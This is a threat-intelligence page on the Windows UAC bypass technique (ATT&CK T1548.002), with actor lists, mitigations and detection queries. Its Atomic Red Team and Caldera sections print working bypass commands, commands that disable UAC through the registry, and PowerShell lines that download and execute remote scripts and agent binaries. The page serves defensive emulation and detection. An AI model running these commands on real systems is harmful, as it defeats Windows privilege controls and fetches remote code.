Home/ATT&CK Technique/Bypass User Account Control
ATT&CK Technique

Bypass User Account Control

T1548.002 · privilege-escalation

Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated Component Object Model objects without prompting the user through the UAC notification box. An example of this is use of Rundll32 to load a specifically crafted DLL which loads an auto-elevated Component Object Model object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.

Windows

Actors Using This

14
iranAgrius
russiaAPT29
chinaAquatic Panda
russia_speaking_organized_cybercrimeBumblebee Operators / EXOTIC LILY
chinaChimera (G0114)
north_koreaCitrine Sleet
russia_speaking_organized_cybercrimeDarkGate Operators
russia_speaking_organized_cybercrimeDarkSide / BlackMatter
russia_aligned_destructive_operations_uncertain_sandworm_attributionDoubleZero
russia_speaking_organized_cybercrimeEmotet Operators
russia_speaking_organized_cybercrimeFIN8
iranHexane / Lyceum (G1001)
russia_speaking_organized_cybercrimeIcedID / BokBot Operators (Lunar Spider)
predominantly_english_speaking_youth_organized_crimeLAPSUS$

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
resource-development earlier
T1608.001 · Upload Malware ×4.50
execution earlier
T1559.001 · Component Object Model ×5.41
privilege-escalation same
T1134.001 · Token Impersonation/Theft ×7.93T1134.002 · Create Process with Token ×7.14T1484 · Domain or Tenant Policy Modification ×5.95
credential-access later
T1003.004 · LSA Secrets ×8.50
discovery later
T1069.001 · Local Groups ×5.41
lateral-movement later
T1550.001 · Application Access Token ×5.95
collection later
T1074.002 · Remote Data Staging ×7.44
command-and-control later
T1571 · Non-Standard Port ×5.45
exfiltration later
T1030 · Data Transfer Size Limits ×6.80T1048.002 · Exfiltration Over Asymmetric Encrypted Non-C2 Protocol ×5.29
other same
T1564.004 · NTFS File Attributes ×8.93T1218.010 · Regsvr32 ×7.14T1562.002 · Disable Windows Event Logging ×5.29

Atomic Tests

25
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptwindowsBypass UAC using Event Viewer (cmd)
Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privileges. 
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
powershellwindowsBypass UAC using Event Viewer (PowerShell)
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privalages 
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
command_promptwindowsBypass UAC using Fodhelper
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. 
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f
fodhelper.exe
powershellwindowsBypass UAC using Fodhelper - PowerShell
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. 
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
powershellwindowsBypass UAC using ComputerDefaults (PowerShell)
PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open 
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
command_promptelevatedwindowsBypass UAC by Mocking Trusted Directories
Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch 
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
powershellwindowsBypass UAC using sdclt DelegateExecute
Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) 
New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value '#{command_to_execute}'
New-ItemProperty -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute"
Start-Process -FilePath $env:windir\system32\sdclt.exe
Start-Sleep -s 3
command_promptelevatedwindowsDisable UAC using reg.exe
Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
command_promptwindowsBypass UAC using SilentCleanup task
Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). For example, we can set the windir registry kye to: "cmd /k REM " And forcefully run SilentCleanup task: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. 
"#{file_path}"
command_promptwindowsUACME Bypass Method 23
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: Leo Davidson derivative Type: Dll Hijack Method: IFileOperation Target: \system32\pkgmgr.exe Component: DismCore.dll Implementation: ucmDismMethod UCM Method: UacMethodDISM https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 31
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: Enigma0x3 Type: Shell API Method: Registry key manipulation Target: \system32\sdclt.exe Component: Attacker defined Implementation: ucmSdcltIsolatedCommandMethod UCM Method: UacMethodShellSdclt https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 33
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: winscripting.blog Type: Shell API Method: Registry key manipulation Target: \system32\fodhelper.exe Component: Attacker defined Implementation: ucmShellRegModMethod UCM Method: UacMethodMsSettings2 https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 34
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: James Forshaw Type: Shell API Method: Environment variables expansion Target: \system32\svchost.exe via \system32\schtasks.exe Component: Attacker defined Implementation: ucmDiskCleanupEnvironmentVariable UCM Method: UacMethodDiskSilentCleanup https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 39
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: Stefan Kanthak Type: Dll Hijack Method: .NET Code Profiler Target: \system32\mmc.exe Component: Attacker defined Implementation: ucmCorProfilerMethod UCM Method: UacMethodCorProfiler https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 56
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: Hashim Jawad Type: Shell API Method: Registry key manipulation Target: \system32\WSReset.exe Component: Attacker defined Implementation: ucmShellRegModMethod UCM Method: UacMethodShellWSReset https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 59
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: James Forshaw Type: AppInfo ALPC Method: RAiLaunchAdminProcess and DebugObject Target: Attacker defined Component: Attacker defined Implementation: ucmDebugObjectMethod UCM Method: UacMethodDebugObject https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
command_promptwindowsUACME Bypass Method 61
Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts. Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir Type: Shell API Method: Registry key manipulation Target: \system32\slui.exe, \system32\changepk.exe Component: Attacker defined Implementation: ucmShellRegModMethod UCM Method: UacMethodDebugObject https://github.com/hfiref0x/UACME 
"#{uacme_exe}"
powershellwindowsWinPwn - UAC Magic
UAC bypass using Magic technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
powershellwindowsWinPwn - UAC Bypass ccmstp technique
UAC bypass using ccmstp technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
powershellwindowsWinPwn - UAC Bypass DiskCleanup technique
UAC bypass using DiskCleanup technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
powershellwindowsWinPwn - UAC Bypass DccwBypassUAC technique
UAC Bypass DccwBypassUAC technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
powershellelevatedwindowsDisable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Disable User Account Conrol (UAC) for admin by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0. [MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), [Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), [Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat) 
$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force
powershellwindowsUAC Bypass with WSReset Registry Modification
The following UAC bypass is focused on a registry key under "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" that will trigger a command once wsreset.exe runs. This bypass is limited to Windows 10 1803/1809 and may not run on Server platforms. The registry mod is where interest will be. If successful, the command to run will spawn off wsreset.exe. [UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/) 
New-Item #{commandpath} -Force | Out-Null
New-ItemProperty -Path #{commandpath} -Name "DelegateExecute" -Value "" -Force | Out-Null
Set-ItemProperty -Path #{commandpath} -Name "(default)" -Value "#{commandtorun}" -Force -ErrorAction SilentlyContinue | Out-Null
$Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
powershellelevatedwindowsDisable UAC - Switch to the secure desktop when prompting for elevation via registry key
User Account Control (UAC) is a security mechanism for limiting the elevation of privileges, including administrative accounts, unless authorized. This setting ensures that the elevation prompt is only used in secure desktop mode. Disable User Account Conrol (UAC) for secure desktop by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop to 0. 
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force
command_promptwindowsDisable UAC notification via registry keys
This atomic regarding UACDisableNotify pertains to the notification behavior of UAC. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. The BlotchyQuasar RAT defense evasion activities that the adversary to disable UAC notifications makes it easier for malware and malicious software to execute with elevated privileges. [Article](https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/) 
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify /t REG_DWORD /d 1 /f

Mitigations

4
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1047Audit

Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements.

The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures. Auditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as, healthcare, finance and government where compliance requirements demand stringent tracking of user and system activates.

System Audit
  • Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.
  • Implementation: Use tools to scan for deviations from established benchmarks.
Permission Audits
  • Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.
  • Implementation: Run access reviews to identify users or groups with excessive permissions.
Software Audits
  • Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.
  • Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.
Configuration Audits
  • Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).
  • Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.
Network Audits
  • Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.
  • Implementation: Utilize tools such as Wireshark, or Zeek to monitor and log suspicious network behavior.
M1051Update Software

Software updates ensure systems are protected against known vulnerabilities by applying patches and upgrades provided by vendors. Regular updates reduce the attack surface and prevent adversaries from exploiting known security gaps. This includes patching operating systems, applications, drivers, and firmware.

Regular Operating System Updates
  • Implementation: Apply the latest Windows security updates monthly using WSUS (Windows Server Update Services) or a similar patch management solution. Configure systems to check for updates automatically and schedule reboots during maintenance windows.
  • Use Case: Prevents exploitation of OS vulnerabilities such as privilege escalation or remote code execution. Application Patching.
  • Implementation: Monitor Apache's update release notes for security patches addressing vulnerabilities. Schedule updates for off-peak hours to avoid downtime while maintaining security compliance.
  • Use Case: Prevents exploitation of web application vulnerabilities, such as those leading to unauthorized access or data breaches. Firmware Updates.
  • Implementation: Regularly check the vendor’s website for firmware updates addressing vulnerabilities. Plan for update deployment during scheduled maintenance to minimize business disruption.
  • Use Case: Protects against vulnerabilities that adversaries could exploit to gain access to network devices or inject malicious traffic. Emergency Patch Deployment.
  • Implementation: Use the emergency patch deployment feature of the organization's patch management tool to apply updates to all affected Exchange servers within 24 hours.
  • Use Case: Reduces the risk of exploitation by rapidly addressing critical vulnerabilities. Centralized Patch Management.
  • Implementation: Implement a centralized patch management system, such as SCCM or ManageEngine, to automate and track patch deployment across all environments. Generate regular compliance reports to ensure all systems are updated.
  • Use Case: Streamlines patching processes and ensures no critical systems are missed.
Tools for Implementation Patch Management Tools
  • WSUS: Manage and deploy Microsoft updates across the organization.
  • ManageEngine Patch Manager Plus: Automate patch deployment for OS and third-party apps.
  • Ansible: Automate updates across multiple platforms, including Linux and Windows.
Vulnerability Scanning Tools
  • OpenVAS: Open-source vulnerability scanning to identify missing patches.
M1052User Account Control

User Account Control (UAC) is a security feature in Microsoft Windows that prevents unauthorized changes to the operating system. UAC prompts users to confirm or provide administrator credentials when an action requires elevated privileges. Proper configuration of UAC reduces the risk of privilege escalation attacks.

Enable UAC Globally
  • Ensure UAC is enabled through Group Policy by setting User Account Control: Run all administrators in Admin Approval Mode to Enabled.
Require Credential Prompt
  • Use Group Policy to configure UAC to prompt for administrative credentials instead of just confirmation (User Account Control: Behavior of the elevation prompt). Restrict Built-in Administrator Account: Set Admin Approval Mode for the built-in Administrator account to Enabled in Group Policy.
Secure the UAC Prompt
  • Configure UAC prompts to display on the secure desktop (User Account Control: Switch to the secure desktop when prompting for elevation).
Prevent UAC Bypass
  • Block untrusted applications from triggering UAC prompts by configuring User Account Control: Only elevate executables that are signed and validated.
  • Use EDR tools to detect and block known UAC bypass techniques.
Monitor UAC-Related Events
  • Use Windows Event Viewer to monitor for event ID 4688 (process creation) and look for suspicious processes attempting to invoke UAC elevation.
Tools for Implementation Built-in Windows Tools
  • Group Policy Editor: Configure UAC settings centrally for enterprise environments.
  • Registry Editor: Modify UAC-related settings directly, such as EnableLUA and ConsentPromptBehaviorAdmin.
Endpoint Security Solutions
  • Microsoft Defender for Endpoint: Detects and blocks UAC bypass techniques.
  • Sysmon: Logs process creations and monitors UAC elevation attempts for suspicious activity.
Third-Party Security Tools
  • Process Monitor (Sysinternals): Tracks real-time processes interacting with UAC.
  • EventSentry: Monitors Windows Event Logs for UAC-related alerts.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 56
Analytics (MITRE CAR) 3
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

3
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2013-10-002Moderate coverageDLL Injection via Load Library

Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes.

For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls.

One of the most common methods of DLL Injection is through the Windows API LoadLibrary.

- Allocate memory in the target program with VirtualAllocEx
  • Write the name of the DLL to inject into this program with WriteProcessMemory.
  • Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread. This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.
pseudocode
remote_thread = search Thread:RemoteCreate
remote_thread = filter (start_function == "LoadLibraryA" or start_function == "LoadLibraryW")
remote_thread = filter (src_image_path != "C:\Path\To\TrustedProgram.exe")

output remote_thread
LogPoint
norm_id=WindowsSysmon event_id=8 start_function IN ["LoadLibraryA", "LoadLibraryW"] -source_image="C:\Path\To\TrustedProgram.exe"
CAR-2019-04-001Low coverageUAC Bypass

Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source UACME tool.

splunk
index=_your_sysmon_index_ EventCode=1 IntegrityLevel=High|search (ParentCommandLine="\"c:\\windows\\system32\\dism.exe\"*""*.xml" AND Image!="c:\\users\\*\\appdata\\local\\temp\\*\\dismhost.exe") OR ParentImage=c:\\windows\\system32\\fodhelper.exe OR (CommandLine="\"c:\\windows\\system32\\wusa.exe\"*/quiet*" AND User!=NOT_TRANSLATED AND CurrentDirectory=c:\\windows\\system32\\ AND ParentImage!=c:\\windows\\explorer.exe) OR CommandLine="*.exe\"*cleanmgr.exe /autoclean*" OR (ParentImage="c:\\windows\\*dccw.exe" AND Image!="c:\\windows\\system32\\cttune.exe") OR Image="c:\\program files\\windows media player\\osk.exe" OR ParentImage="c:\\windows\\system32\\slui.exe"|eval PossibleTechniques=case(like(lower(ParentCommandLine),"%c:\\windows\\system32\\dism.exe%"), "UACME #23", like(lower(Image),"c:\\program files\\windows media player\\osk.exe"), "UACME #32", like(lower(ParentImage),"c:\\windows\\system32\\fodhelper.exe"),  "UACME #33", like(lower(CommandLine),"%.exe\"%cleanmgr.exe /autoclean%"), "UACME #34", like(lower(Image),"c:\\windows\\system32\\wusa.exe"), "UACME #36", like(lower(ParentImage),"c:\\windows\\%dccw.exe"), "UACME #37", like(lower(ParentImage),"c:\\windows\\system32\\slui.exe"), "UACME #45")
pseudocode
processes = search Process:Create
possible_uac_bypass = filter processes where (
  integrity_level == "High" and
  (parent_image_path == "c:\windows\system32\fodhelper.exe") or
  (command_line == "*.exe\"*cleanmgr.exe /autoclean*") or
  (image_path == "c:\program files\windows media player\osk.exe") or
  (parent_image_path == "c:\windows\system32\slui.exe") or
  (parent_command_line == '"c:\windows\system32\dism.exe"*""*.xml"' and image_path != "c:\users\*\appdata\local\temp\*\dismhost.exe") or
  (command_line == '"c:\windows\system32\wusa.exe"*/quiet*' and user != "NOT_TRANSLATED" and current_working_directory == "c:\windows\system32\" and parent_image_path != "c:\windows\explorer.exe") or
  (parent_image_path == "c:\windows\*dccw.exe" and image_path != "c:\windows\system32\cttune.exe")
)
output possible_uac_bypass
LogPoint
norm_id=WindowsSysmon event_id=1 integrity_level="High" ((parent_image="c:\windows\system32\fodhelper.exe" OR command='*.exe"*cleanmgr.exe /autoclean*' OR image="c:\program files\windows media player\osk.exe" OR parent_image="c:\windows\system32\slui.exe") OR (parent_command='"c:\windows\system32\dism.exe"*""*.xml"' -image="c:\users\*\appdata\local\temp\*\dismhost.exe") OR (parent_image="c:\windows\*dccw.exe" -image="c:\windows\system32\cttune.exe") OR (command='"c:\windows\system32\wusa.exe"*/quiet*' -user="NOT_TRANSLATED" path="c:\windows\system32\" -parent_image="c:\windows\explorer.exe"))
CAR-2021-01-008Medium coverageDisable UAC

Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using “reg.exe”, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system.

Splunk - Detect disabling of UAC via reg.exe
sourcetype = __your_sysmon_index__ ParentImage = "C:\\Windows\\System32\\cmd.exe" | where like(CommandLine,"reg.exe%HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System%REG_DWORD /d 0%")
pseudocode - Detect disabling of UAC via reg.exe
processes = search Process:Create
cmd_processes = filter processes where (
                (parent_image = "C:\\Windows\\System32\\cmd.exe") AND (command_line = "reg.exe%HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System%REG_DWORD /d 0%")
                )

Caldera Emulation

5
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
privilege-escalationwindowsBypass UAC Medium
$url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"",""); [io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data);
$job = Start-Job -ScriptBlock { Import-Module -Name .\Bypass-UAC.ps1; Bypass-UAC -Command "C:\Users\Public\$name.exe -group #{group}"; };
Receive-Job -Job $job -Wait;
privilege-escalationwindowsSlui File Handler Hijack
.\Akagi64.exe 45 C:\Windows\System32\cmd.exe
privilege-escalationwindowsUAC bypass registry
New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
privilege-escalationwindowsduser/osksupport DLL Hijack
$url="#{server}/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("server","#{server}");
$wc.Headers.add("defaultSleep","60");
$wc.Headers.add("defaultGroup","bypassed_u_bro");
$data=$wc.DownloadData($url);
$name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","");
[io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data);
.\Akagi64.exe 32 "C:\Users\Public\$name.exe -server #{server}"
privilege-escalationwindowswow64log DLL Hijack
.\Akagi64.exe 30 C:\Windows\System32\cmd.exe

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, CM-02, CM-05, CM-06, IA-02, RA-05, SI-02, SI-04
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin